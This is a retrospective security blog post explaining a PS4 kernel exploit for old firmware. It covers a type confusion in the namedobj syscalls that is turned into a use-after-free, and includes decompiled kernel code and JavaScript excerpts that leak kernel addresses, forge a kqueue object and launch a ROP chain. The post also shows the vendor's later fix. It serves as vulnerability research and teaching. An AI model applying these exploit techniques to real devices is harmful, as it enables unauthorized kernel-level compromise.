The First PS4 Kernel Exploit: Adieu
Plenty of time has passed since we first demonstrated Linux running on the PS4.
Now we will step back a bit and explain how we managed to jump from the browser process into the kernel such that ps4-kexec et al. are usable.
Over time, ps4 firmware revisions have progressively added many mitigations and in general tried to lock down the system. This post will mainly touch on vulnerabilities and issues which are not present on the latest releases, but should still be useful for people wanting to investigate ps4 security.
Vulnerability Discovery
As previously explained, we were able to get a dump of the ps4 firmware 1.01 kernel via a PCIe man-in-the-middle attack. Like all FreeBSD kernels, this image included “export symbols” - symbols which are required to perform kernel and module initialization processes. However, the ps4 1.01 kernel also included full ELF symbols (obviously an oversight as they have been removed in later firmware versions). This oversight was beneficial to the reverse engineering process, although of course not a true prerequisite. Indeed, we began exploring the kernel by examining built-in metadata in the form of the syscall handler table - focusing on the ps4-specific entries.
After some recovering of structures, we discovered that a large portion of the ps4-specific syscalls are little more than wrappers to what is essentially a hash table API. The API exposes the following interface:
enum IDT_TYPE : u16 {
IDT_TYPE_EPORT = 0x0030,
IDT_TYPE_SBLOCK = 0x0040,
IDT_TYPE_EVF = 0x0110,
IDT_TYPE_OSEM = 0x0120,
IDT_TYPE_BUDGET = 0x2000,
IDT_TYPE_NAMEDOBJ_DBG = 0x5000,
};
struct id_entry {
struct sx *sxlock;
char *name;
void *ptr;
u64 tid;
IDT_TYPE kind;
u16 is_open;
u16 handle;
u16 state;
};
struct idt_bucket {
struct id_entry entries[128];
};
struct id_table {
struct idt_bucket buckets[64];
struct mtx mutex;
u32 num_buckets;
u32 cur_handle;
u32 max_entries;
};
id_table *id_table_create(int max_entries);
void id_table_destroy(id_table *idt);
int id_alloc(id_table *idt, id_entry **ide);
void id_set(id_entry *ide, IDT_TYPE kind, void *data, char *name);
void id_set_open(id_entry *ide, IDT_TYPE kind, void *data, char *name);
int id_is_opened(id_entry *ide);
void id_free(id_table *idt, int handle, id_entry *ide);
void id_unlock(id_entry *ide);
void *id_rlock(id_table *idt, signed int index, IDT_TYPE kind, id_entry **ide);
void *id_rlock_name(id_table *idt, IDT_TYPE kind, char *name, id_entry **ide);
void *id_wlock(id_table *idt, signed int index, IDT_TYPE kind, id_entry **ide);
Each process object in the kernel contains its own “idt” (ID Table) object. As
can be inferred from the snippet above, the hash table essentially just stores
pointers to opaque data blobs, along with a given kind
and name
. Entries
may be accessed (and thus “locked”) with either read or write intent.
Note that IDT_TYPE
is not a bitfield consisting of only unique powers of 2.
This means that if we can control the kind
of an id_entry
, we may be able to
cause a type confusion to occur (it is assumed that we may control name
). Sure
enough, kind
may be set from usermode via the namedobj_create
syscall:
struct namedobj_usr_t {
char *name;
void *object;
u64 field_10;
};
int sys_namedobj_create(struct thread *td, void *args) {
MACRO_EPERM rv; // ebx
int kind; // er14
id_table *idt; // r12
char *name; // r13
namedobj_usr_t *no; // rbx
int handle; // er15
id_entry *ide; // [rsp+8h] [rbp-38h]
__int64 v10; // [rsp+10h] [rbp-30h]
rv = EINVAL;
if ( *(_QWORD *)args ) {
// Note this is almost completely usermode-controlled!
kind = *((_DWORD *)args + 4) | 0x1000;
idt = td->td_proc->sce_idt;
name = (char *)malloc(0x20uLL, &M_NAME, 2);
rv = copyinstr(*(const void **)args, name, 0x20uLL, 0LL);
if ( rv ) {
free(name, &M_NAME);
} else {
no = (namedobj_usr_t *)malloc(0x18uLL, &M_NAME, 2);
no->name = name;
no->object = *((_QWORD *)args + 1);
handle = id_alloc(idt, &ide);
if ( handle == -1 ) {
free(name, &M_NAME);
free(no, &M_NAME);
rv = EAGAIN;
} else {
id_set(ide, (IDT_TYPE)kind, no, name);
id_unlock(ide);
td->td_retval[0] = handle;
rv = 0;
}
}
}
return rv;
}
Now we need to find a way to have the kernel access and improperly use an
object from our process’ (i.e. the browser process) idt which has a kind
of
0x1000
plus any other number of bits set. This was found in the following code:
struct namedobj_dbg_t {
u32 field_0;
u32 _pad_4; // compiler-inserted alignment
u64 field_8;
u64 field_10;
u64 field_18;
u64 field_20;
};
int namedobj_create_ex(id_table *idt, char *name, u32 a3, u64 a4, u64 a5,
u64 a6, u64 a7) {
namedobj_dbg_t *no_exists; // rax
int rv; // er13
id_entry *ide_existing; // [rsp+20h] [rbp-40h]
rv = EAGAIN;
no_exists = (namedobj_dbg_t *)id_rlock_name(idt, IDT_TYPE_NAMEDOBJ_DBG, name,
&ide_existing);
if ( no_exists )
{
no_exists->field_0 = a3;
no_exists->field_8 = a4;
no_exists->field_10 = a5;
no_exists->field_18 = a6;
no_exists->field_20 = a7;
id_unlock(ide_existing);
rv = 0;
}
// ... unrelated code removed
return rv;
}
…which is accessible from the mdbg_service
syscall:
struct mdbg_service_arg1 {
u32 field_0;
u64 field_4;
u64 field_8;
u64 field_10;
u64 field_18;
u64 field_20;
char name[32];
};
int sys_mdbg_service(struct thread *td, void *args) {
signed int rv; // ebx
void *uptr; // r14
mdbg_service_arg1 cmd_1; // [rsp+18h] [rbp-68h]
rv = 78;
uptr = (void *)*((_QWORD *)args + 1);
switch ( (unsigned __int64)*(unsigned int *)args ) {
// ... unrelated code removed
case 1uLL:
rv = copyin(uptr, &cmd_1, 0x48uLL);
if ( rv )
break;
cmd_1.name[31] = 0;
rv = namedobj_create_ex(
td->td_proc->sce_idt,
cmd_1.name,
cmd_1.field_4,
cmd_1.field_8,
cmd_1.field_10,
cmd_1.field_18,
cmd_1.field_20);
break;
// ... unrelated code removed
}
return rv;
}
Using the combination of these syscalls, we can induce a type confusion. First,
calling namedobj_create(name = "haxplz", kind = 0x1000 | 0x4000, ...)
will cause
the kernel to set a pointer of type namedobj_usr_t
into the idt. Then, calling
namedobj_create_ex(name = "haxplz", ...)
will cause the kernel to access the
same pointer, but cast it to type namedobj_dbg_t
!
Exploitation
To an exploiter without ps4 background, it might seem that the easiest way to
exploit this bug would be to take advantage of the write off the end of the
malloc’d namedobj_usr_t
object. However, this turns out to be impossible (as
far as I know) because of a side effect of the ps4 page size being changed to
0x4000 bytes (from the normal of 0x1000). It appears that in order to change
the page size globally, the ps4 kernel developers opted to directly change the
related macros.
One of the many changes resulting from this is that the smallest actual amount
of memory which malloc may give back to a caller becomes
0x40 bytes.
While this also results in tons of memory being completely wasted, it does serve
to nullify certain exploitation techniques (likely completely by accident…).
UAF Crafting
The way chosen to exploit this type confusion was actually to convert it into a
use-after-free scenario. This was done with the help of the namedobj_delete
syscall:
int sys_namedobj_delete(struct thread *td, void *args) {
struct proc *p; // rax
id_table *idt; // r15
namedobj_usr_t *no; // r14
int rv; // eax
id_entry *id_out; // [rsp+8h] [rbp-28h]
p = td->td_proc;
idt = p->sce_idt;
no = (namedobj_usr_t *)id_wlock(
p->sce_idt,
*(_DWORD *)args,
(IDT_TYPE)(*((_WORD *)args + 4) & ~0x1000 | 0x1000),
&id_out);
rv = ESRCH;
if ( no )
{
id_free(idt, *(_DWORD *)args, id_out);
id_unlock(id_out);
free(no->name, &M_NAME);
free(no, &M_NAME);
rv = 0;
}
return rv;
}
Note that the type confusion allows us to cast a namedobj_usr_t
object to a
namedobj_dbg_t
one, and then update all of the namedobj_dbg_t
fields. Not
only does this allow us to write off the end of the actual namedobj_usr_t
object, it also allows writing to the lower 32bits of the namedobj_usr_t.name
pointer, as well all the other namedobj_usr_t
fields. The fact that we may
only update the lower 32bits of namedobj_usr_t.name
is actually a blessing in
disguise (although it doesn’t matter so much for this post).
So, the use-after-free primitive we have allows us to free()
any kernel address
which happens to share the top 32bits with no->name
. This means we can have
our choice of any malloc’d pointer to free - we just need to somehow find such
a pointer :) Obviously, such a pointer should be able to be used in a nice way
after we free it and reallocate the backing memory.
Finding a UAF Target
Since this was my first time working with FreeBSD, I just looked for some kernel object containing some function pointers which I could somehow derive the address of from the browser process. It turns out that on firmware 1.01 this is incredibly easy:
sysctlbyname("kern.file", ...)
will happily give you various kernel addresses relating to the file objects which the kernel uses to manage userspace file descriptors. From the exploit code:
constructor.prototype.getFileDescriptorKernelDataPtr = function(fd) {
var fd_xf_data = 0;
sys.getSysCtlByName('kern.file', function(oldp, oldlen) {
var pid = sys.getCurrentProcessId();
var file_size = read64(oldp).lo;
var num_files = oldlen / file_size;
for (var i = 0; i < num_files; i++) {
var xf_pid = read32(oldp.plus(i * file_size + 0x08));
var xf_fd = read32(oldp.plus(i * file_size + 0x10));
var xf_data = read64(oldp.plus(i * file_size + 0x38));
if (xf_pid == pid && xf_fd == fd) {
fd_xf_data = xf_data;
return;
}
}
});
return fd_xf_data;
}
file.f_data
value (for a fd
you control) in javascript.
The type of the object pointed to by file.f_data
depends on what type of file
descriptor it is. I used kqueue
as this met my goal of a target object
containing function pointers. The idea will be to overwrite a kqueue
and then
cause one of the function pointers within kq->kq_knlist->kn_knlist
to be
executed, which will point to a rop chain. Note kq_knlist
and kn_knlist
are
lists (as their names state), not standard pointers.
Putting it Together
Another exploit excerpt:
// finalize the ropchain and invoke it
constructor.prototype.trigger_kqueue = function() {
var fakefd = callFunc(syms.libkernel.kqueue).lo;
var filep = this.leaks.getFileDescriptorKernelDataPtr(fakefd);
var rop_scratch_len = 0;
var data_buf_len = this.kqueue_sizeof + this.klist_sizeof + this.knote_sizeof +
this.filterops_sizeof + this.knlist_sizeof + this.jmpbuf_sizeof +
rop_scratch_len;
var data_buf = allocateGCMemory(data_buf_len);
clearMemory(data_buf, data_buf_len);
var fakekq = data_buf;
var kl = fakekq.plus(this.kqueue_sizeof);
var kn = kl.plus(this.klist_sizeof);
var fop = kn.plus(this.knote_sizeof);
var knl = fop.plus(this.filterops_sizeof);
var jmpbuf = knl.plus(this.knlist_sizeof);
var rop_scratch = jmpbuf.plus(this.jmpbuf_sizeof);
// finalize ropchain
this.emitReturnViaJmpbuf(jmpbuf);
// create fake kq to execute the ropchain
var rop_stack = this.rop.getRopStack();
write64(jmpbuf.plus(0x48), rop_scratch); // rdi
write64(jmpbuf.plus(0x60), 0); // rcx (why?)
write64(jmpbuf.plus(0xe0), gadgets.ret); // next rip
write64(jmpbuf.plus(0xf8), rop_stack); // rsp
// longjmp_tail needs at least 1 stack slot to push next rip onto
write64(knl.plus(0x08), gadgets.ret); // kl_lock
write64(knl.plus(0x10), gadgets.longjmp_tail); // kl_unlock
write64(knl.plus(0x18), gadgets.ret); // kl_assert_locked
write64(knl.plus(0x20), gadgets.ret); // kl_assert_unlocked
write64(knl.plus(0x28), jmpbuf); // kl_lockarg (passed as
// rdi to the above funcptrs)
write32(fop, 1); // f_isfd = 1
write64(fop.plus(0x18), gadgets.ret0); // f_event = {ret 0}
write64(kn.plus(0x10), knl); // kn_knlist
write32(kn.plus(0x38), this.EVFILT_READ); // kn_filter = EVFILT_READ (16bit)
write32(kn.plus(0x50), 2); // kn_status = KN_QUEUED
write64(kn.plus(0x68), fop); // kn_fop
write64(kl, kn); // slh_first = &kn
this.writeFakeMtx(fakekq.plus(0)); // kq_lock
write32(fakekq.plus(0xa4), 1); // kq_knlistsize = 1
write64(fakekq.plus(0xa8), kl); // kq_knlist = &kl
var change = allocateGCMemory(this.kevent_sizeof);
clearMemory(change, this.kevent_sizeof);
write32(change.plus(8), this.EVFILT_READ);
// free, try to fill the buffer, then cause it to be used
this.kernelFree(filep);
this.ioctlSpray(fakekq, this.kqueue_sizeof);
callFunc(syms.libkernel.kevent, fakefd, change, 1, 0, 0, 0);
// safe as long as injected code has fixed the corrupted kqueue
callFunc(syms.libkernel.close, fakefd);
}
Above is shown the creation of a kqueue
object in userspace, which then gets
sprayed into the kernel after performing our UAF primitive (via kernelFree()
)
simply by calling ioctl()
with it. After the spray, executing the syscall
kevent()
with the fd relating to our corrupted file
object will cause the
kernel to call the kqueue
object’s kl_unlock
function pointer, which will
kick off execution of the ROP chain.
Cleaning Up
Since this exploit leaves a corrupted file
object in the browser’s file
descriptor table, the first thing for the kernel payload to do is actually to
remove that corruption. Otherwise, the kernel will eventually panic (normally
while iterating the process’ file descriptor table in an attempt to close()
all of them). This can easily be done with the following:
void fix_corrupted_kqueue(struct thread *td) {
// This method prevents the kernel from crashing (most of the time), but
// the process will sigsegv when exiting.
// blog note:
// I actually no longer remember if the above comment is true.
// I always kexec directly to linux so it doesn't matter to me :)
struct filedesc *fdp = td->td_proc->p_fd;
for (int fd = 0; fd < fdp->fd_nfiles; fd++) {
struct file *fp = fdp->fd_ofiles[fd];
if (fp && fp->f_type == DTYPE_KQUEUE) {
struct kqueue *kq = fp->f_data;
if ((uintptr_t)kq->kq_knlist < VM_USER_MAX) {
// found the bad one...kill it
SLIST_REMOVE(&fdp->fd_kqlist, kq, kqueue, kq_list);
fdp->fd_ofiles[fd] = NULL;
fdp->fd_ofileflags[fd] = 0;
return;
}
}
}
}
...
fix_corrupted_kqueue(curthread());
Adieu
The namedobj exploit was present and exploitable (albeit using a slightly different method than described here) until it was fixed in firmware version 4.06. This vulnerability was also found and exploited by (at least) Chaitin Tech, so props to them! Taking a quick look at the 4.07 kernel, we can see a straightforward fix (4.06 is assumed to be identical - only had 4.07 on hand while writing this post):
int sys_namedobj_create(struct thread *td, void *args) {
// ...
rv = EINVAL;
kind = *((_DWORD *)args + 4)
if ( !(kind & 0x4000) && *(_QWORD *)args ) {
// ... (unchanged)
}
return rv;
}
And so we say goodbye to a nice exploit.
I hope you enjoyed this blast from the past :)
Keep hacking!